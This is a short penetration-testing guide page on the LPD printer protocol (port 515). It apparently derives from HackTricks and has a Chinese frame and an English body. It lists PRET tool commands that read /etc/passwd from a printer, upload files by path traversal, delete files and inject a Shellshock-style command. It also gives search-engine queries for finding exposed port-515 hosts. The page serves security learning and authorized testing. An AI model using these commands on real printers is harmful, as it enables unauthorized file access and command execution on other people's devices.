--- title: "515 - Lpd" weight: 515 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **515 - LPD** 的渗透测试方法,适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- > ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 ## 515 渗透测试 Line Printer Daemon (LPD) ### **简介 to LPD 协议** In the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds the print information). While the control file allows the selection of **various file formats** for the data file, the handling of these files is determined by the specific LPD implementation. A widely recognized implementation for Unix-like systems is **LPRng**. Notably, the LPD protocol can be exploited to execute **malicious PostScript** or **PJL print jobs**. ### **Tools for Interacting with LPD Printers** [**PRET**](https://github.com/RUB-NDS/PRET) introduces two essential tools, `lpdprint` and `lpdtest`, offering a straightforward method to interact with LPD-compatible printers. These tools enable a range of actions from printing data to manipulating files on the printer, such as downloading, uploading, or deleting: ```python ## To print a file to an LPD printer lpdprint.py hostname filename ## To get a file from the printer lpdtest.py hostname get /etc/passwd ## To upload a file to the printer lpdtest.py hostname put ../../etc/passwd ## To remove a file from the printer lpdtest.py hostname rm /some/file/on/printer ## To execute a command injection on the printer lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' ## To send a mail through the printer lpdtest.py hostname mail lpdtest@mailhost.local ``` For individuals interested in further exploring the realm of **printer hacking**, a comprehensive resource can be found here: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). ### Shodan - `port 515` --- --- --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="515" ``` #### Shodan ```bash # Shodan 搜索语法 port:515 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:515 ``` --- ## 📖 参考资料 - [HackTricks - 515-lpd](https://book.hacktricks.wiki/en/network-services-pentesting/515-lpd.html)